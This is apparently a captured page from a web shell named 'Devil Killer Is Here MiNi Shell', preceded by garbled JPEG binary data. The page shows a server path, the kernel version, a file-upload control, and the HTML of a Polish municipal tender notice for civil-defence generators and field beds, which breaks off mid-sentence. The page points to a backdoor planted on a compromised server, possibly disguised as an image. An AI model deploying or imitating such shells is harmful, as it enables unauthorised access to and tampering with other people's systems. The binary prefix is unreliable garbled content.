JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20251023/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20251023/0049379801-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Zakup sprzętu i wyposażenia w ramach programu Ochrony Ludności i Obrony Cywilnej na 2025 rok </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Maków</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 750148331</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Akacjowa 2A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Maków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">96-124</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL715 - Skierniewicki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">468310846</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@gminamakow.info</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.ugmakow.nv.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup sprzętu i wyposażenia w ramach programu Ochrony Ludności i Obrony Cywilnej na 2025 rok </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-6b94254c-473e-4906-b91a-0ff64ea1a905</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00493798</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-10-23</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00055004/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 Zakup sprzętu w ramach programu Ochrony Ludności i Obrony Cywilnej na 2025 rok</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://asystent.postepowania.pl/org/gminamakow/postepowania/1950 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W niniejszym postępowaniu komunikacja, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między zamawiającym a wykonawcą, z uwzględnieniem wyjątków określonych w<br/>Ustawie, odbywa się przy użyciu środków komunikacji elektronicznej (za pomocą platformy „Asystent Postępowania”, dostępnej pod adresem https://postepowania.pl/ oraz poczty elektronicznej), przy czym ofertę można złożyć tylko za pomocą platformy „Asystent postępowania”.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">11.3. Zmiany i wyjaśnienia treści<br/>Specyfikacji Warunków Zamówienia oraz inne dokumenty zamówienia bezpośrednio związane z postępowaniem o udzielenie<br/>zamówienia będą udostępniane pod następującym adresem strony internetowej https://asystent.postepowania.pl/org/gminamakow/postepowania/1950.<br/><br/>11.4. W niniejszym postępowaniu komunikacja, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między zamawiającym a wykonawcą, z uwzględnieniem wyjątków określonych w Ustawie, odbywa się przy użyciu środków komunikacji elektronicznej (za pomocą platformy „Asystent Postępowania”, dostępnej pod adresem https://postepowania.pl/ oraz poczty elektronicznej), przy czym ofertę można złożyć tylko za pomocą platformy „Asystent postępowania”.<br/><br/>11.5. Wykonawca zamierzający wziąć udział w niniejszym postępowaniu o udzielenie zamówienia publicznego musi posiadać konto<br/>na platformie „Asystent postępowania” oraz zaakceptować Regulamin korzystania ze wskazanej platformy. Instrukcja założenia<br/>konta dla Wykonawcy i złożenia oferty oraz wskazany Regulamin znajduje się pod wskazanym w pkt 11.4. adresem.<br/><br/>11.6. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia, wycofania oferty oraz do<br/>komunikacji wynosi 150 MB. Pozostałe wymogi techniczne wskazane są w Regulaminie dostępnym pod adresem wskazanym w pkt. 11.4.<br/><br/>11.7. Za datę przekazania oferty w formie elektronicznej, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na platformie „Asystent postępowania”.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">23.2. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>a)	Administratorem Pani/Pana danych osobowych jest Gmina Maków, ul. Akacjowa 2A, 96-124 Maków, e-mail: urząd@gminamakow.info;<br/>a)	inspektorem ochrony danych osobowych w Urzędzie Gminy w Makowie jest Mateusz Szenbek, adres e-mail: mateuszszenbek@bodo24.pl;<br/>a)	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego pn. „Zakup sprzętu i wyposażenia w ramach programu Ochrony Ludności i Obrony Cywilnej na 2025 rok” prowadzonym w trybie podstawowym na podstawie ustawy z 11 września 2019 roku Prawo zamówień publicznych.<br/>a)	Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania.<br/>a)	Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem wynikającym z przepisów prawa.<br/>a)	Posiada Pani/Pan:<br/>1.	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>1.	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z obowiązującymi przepisami oraz nie może naruszać integralności protokołu oraz jego załączników);<br/>1.	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego).Zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia. <br/>1.	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>a)	Nie przysługuje Pani/Panu:<br/>1.	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>1.	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO; na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>1.	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">23.2. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>a)	Administratorem Pani/Pana danych osobowych jest Gmina Maków, ul. Akacjowa 2A, 96-124 Maków, e-mail: urząd@gminamakow.info;<br/>a)	inspektorem ochrony danych osobowych w Urzędzie Gminy w Makowie jest Mateusz Szenbek, adres e-mail: mateuszszenbek@bodo24.pl;<br/>a)	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego pn. „Zakup sprzętu i wyposażenia w ramach programu Ochrony Ludności i Obrony Cywilnej na 2025 rok” prowadzonym w trybie podstawowym na podstawie ustawy z 11 września 2019 roku Prawo zamówień publicznych.<br/>a)	Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania.<br/>a)	Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem wynikającym z przepisów prawa.<br/>a)	Posiada Pani/Pan:<br/>1.	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>1.	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z obowiązującymi przepisami oraz nie może naruszać integralności protokołu oraz jego załączników);<br/>1.	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego).Zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia. <br/>1.	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>a)	Nie przysługuje Pani/Panu:<br/>1.	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>1.	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO; na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>1.	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RI.271.9.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 341463,41 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia są 2 sztuki mobilnych agregatów prądotwórczych. Każdy z nich musi spełniać następujące wymogi:<br/>Mobilny agregat prądotwórczy 40-60kva wraz z przyczepą:<br/><br/>WYMAGANIA ZAMAWIAJĄCEGO	<br/>AGREGAT:	<br/>Rodzaj: przenośny	<br/>Typ agregatu: trójfazowy	<br/>Urządzenie fabrycznie nowe, nieużywane, wolne od wad	<br/>Emisja spalin – non – emission	<br/>Rodzaj paliwa: Diesel EN 590	<br/>Pojemność zbiornika paliwa: 120 – 200 l	<br/>Czas pracy bez tankowania: 16 – 18h przy pełnym obciążeniu	<br/>Moc znamionowa 40 – 60 kva <br/>Napięcie 400V	<br/>Częstotliwość 50hz	<br/>Obudowa wykonana z blachy stalowej, powlekanej warstwą antykorozyjną	<br/>Skrzynka elektryczna z okienkiem podglądu parametrów, wyświetlanych na sterowniku, chroniona obudową agregatu	<br/>Podejście przyłącza kablowego zabezpieczone przepustem gumowym	<br/>Możliwość umieszczenia gniazd na zewnątrz obudowy	<br/>Łatwy dostęp serwisowy do głównych podzespołów	<br/>Wysokiej sprawności maty wygłuszające, wykonane z materiałów atestowanych	<br/>Rama spawana ze zintegrowanym zbiornikiem paliwa, wraz ze strefami retencyjnymi, chroniącymi środowisko zewnętrzne przed wyciekiem płynów technicznych.	<br/>Chroniony kluczem wlew paliwa umieszczony na zewnątrz obudowy	<br/>Układy wydechowe wyposażone w tłumiki spalin	<br/>PRZYCZEPA:	<br/>przyczepa fabrycznie nowa, nieużywana, wolna od wad	<br/>Osie: 2xHamowna 1350 kg	<br/>DMC: do 2700 kg	<br/>Ładowność: min. 2300 kg	<br/>Koła: 185R14C	<br/>Sprzęg: urządzenie najazdowe – 1600 – 2700 kg	<br/>koło podporowe	<br/>kliny pod koła	<br/>4 podpory korbowe	<br/>błotniki plastikowe z chlapaczami	<br/>instalacja elektryczna 13-PIN, 12V	<br/>rama stalowa, otworowana, wzmocniona, ocynkowana	<br/>koło zapasowe	<br/>kompletne oświetlenie diodowe LED	<br/>amortyzatory osi	<br/>adapter wtyczki 13-pin do 7-pin	<br/>montaż dostarczonego agregatu na przyczepie	<br/><br/>W ramach zamówienia Wykonawca zobowiązuję się także do:<br/>•	dostawy agregatów do miejsca wskazanego przez Zamawiającego (na terenie gminy Maków) - na koszt Wykonawcy,<br/>•	przeprowadzenia instruktażu z zakresu obsługi dla personelu Zamawiającego,<br/>•	dostarczenia kompletnej dokumentacji w języku polskim, w tym:<br/>- Instrukcji obsługi,<br/>- Dokumentacji techniczno-ruchowej (DTR),<br/>- Karty gwarancyjnej,<br/>- Deklaracji zgodności CE. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">31122000-7 - Jednostki prądotwórcze</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">31121100-1 - Generatory z silnikami o zapłonie samoczynnym</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">17.1. Zamawiający będzie oceniał oferty według następującego kryterium:<br/>1) Cena - waga 60%<br/>2) Skrócenie terminu dostawy - waga 40%<br/><br/>17.2. Punkty przyznawane za podane w pkt. 17.1. kryteria będą liczone według następujących wzorów:<br/>1) Cena:<br/>(Cmin/Cof) * 100 * waga<br/>gdzie:<br/>- Cmin - najniższa cena spośród wszystkich ofert niepodlegających odrzuceniu<br/>- Cof - cena podana w ofercie badanej<br/><br/>2) Skrócenie terminu dostawy:<br/>Podstawowy termin dostaw to 30 dni od dnia podpisania umowy. Wykonawca otrzyma punkty w kryterium:<br/>20 pkt – za zaoferowanie skrócenia terminu dostawy do 21 dni od dnia podpisania umowy,<br/>40 pkt - za zaoferowanie skrócenia terminu dostawy do 14 dni od dnia podpisania umowy.<br/>W przypadku niezaznaczenia żadnego pola albo zaznaczenie obu pól Zmawiający przyzna 0 pkt w tym kryterium i przyjmie, że wykonawca zaoferował realizację dostaw w terminie podstawowym.<br/><br/>17.3. Oferta złożona przez wykonawcę może otrzymać 100 pkt.<br/><br/>17.4. W toku dokonywania badania i oceny ofert zamawiający może żądać udzielenia przez wykonawcę wyjaśnień treści złożonych<br/>przez niego ofert.<br/><br/>17.5. Zamawiający zastosuje zaokrąglanie każdego wyniku do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Skrócenie terminu dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest 50 sztuk łóżek polowych przeznaczonych do zabezpieczenia miejsc spania osób ewakuowanych i poszkodowanych wraz z wyposażeniem w postaci koców, zestawów pościeli i śpiworów oraz 50 sztuk szafek przyłóżkowych dla osób poszkodowanych.<br/><br/>ŁÓŻKA<br/>Stabilna i solidna konstrukcja wykonana ze stalowych rur odpowiedniej grubości, skręcanych na śruby samohamowne, gwarantująca wytrzymałość na obciążenie do 150 kg.<br/>Materac wykonany z mocnej wodoodpornej tkaniny foliowanej PCV, która jest odporna na wilgoć i łatwa do utrzymania w czystości.<br/>Wkład materaca wypełniony gęstą pianką poliuretanową o grubości minimum 20mm. Dolna część wkładu wykonana z tkaniny poliamidowej impregnowanej poliuretanem o właściwościach przeciwgnilnych.<br/>Materac wymienny w kolorze zielonym mocowany do metalowej konstrukcji łóżka za pomocą elastycznych sznurów.<br/>Możliwość regulacji zagłówka.<br/>Wymiary po rozłożeniu (szerokość x długość x wysokość) minimum 70 x 200 x 30 cm (rama) oraz minimum 75 x 210 x 30 cm (z materacem).<br/>Waga pojedynczego łóżka do 15 kg.<br/>Wymiary po złożeniu umożliwiające łatwy transport i przechowywanie.<br/><br/>WYPOSAŻENIE ŁÓŻEK<br/>Koce pościelowe w ilości 50 sztuk.<br/>Minimalne wymiary po rozłożeniu: minimum 140 cm szerokości i 200 cm długości<br/>Materiał wykonania : mieszanka włókien o składzie minimum 20% bawełny, w pozostałej części z włókien syntetycznych odpornych na rozdarcia (np. polietylen, poliester lub materiały podobne)<br/>Gramatura 400 - 450 g/m2 .<br/>Kolorystyka w ciemniejszych odcieniach zapewniających estetyczny i praktyczny wygląd.<br/>Możliwość prania w pralce, przy zachowaniu walorów użytkowych i trwałości po praniu.<br/>Każdy koc powinien być zapakowany indywidulanie w szczelne, łatwo otwieralne opakowanie, zabezpieczające produkt podczas transportu i magazynowania.<br/><br/>Zestawy pościelowe w ilości 50 sztuk. <br/>W skład jednego zestawu wchodzi: <br/>- 1 poduszka, <br/>- 1 komplet pościeli (1 poszewka na koc + 1 poszewka na poduszkę),<br/>- 1 prześcieradło, <br/>- 1 śpiwór typu kołdra.<br/><br/>Poduszki<br/>Rozmiar poduszki - 70 x 80 cm<br/>Poszycie pikowane z mikrofibry lub innej podobnej tkaniny<br/>Wypełnienie antyalergicznym włóknem poliestrowymi lub innym materiałem o podobnych właściwościach.<br/>Możliwość prania przy zachowaniu walorów użytkowych i trwałości po praniu.<br/>Każda poduszka powinna być zapakowana w indywidulane 